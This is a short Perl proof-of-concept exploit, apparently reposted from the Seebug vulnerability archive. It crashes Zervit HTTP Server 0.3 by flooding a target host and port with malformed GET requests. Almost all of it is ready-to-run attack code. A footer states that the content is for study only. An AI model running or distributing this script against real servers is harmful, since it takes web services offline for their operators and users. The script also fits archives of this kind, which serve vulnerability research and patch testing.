#!/usr/bin/perl # # Zervit HTTP Server <= v0.3 Remote Denial of Service. # # -------------------------------------------------------------------- # The vulnerability is caused due to an error in multi-socket. # This can be exploited to crash the HTTP service. # -------------------------------------------------------------------- # # Author: Jonathan Salwan # Mail: submit [AT] shell-storm.org # Web: http://www.shell-storm.org use IO::Socket; print "[+] Author : Jonathan Salwan\n"; print "[+] Soft : Zervit 0.3 Remote DoS\n"; if (@ARGV < 1) { print "[-] Usage: <file.pl> <host> <port>\n"; print "[-] Exemple: file.pl 127.0.0.1 80\n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; print "[+] Sending request...\n"; for($i=0;$i=4;$i++) { $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n"; print $socket "GET \x11 HTTP/1.0\n\r\n"; }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论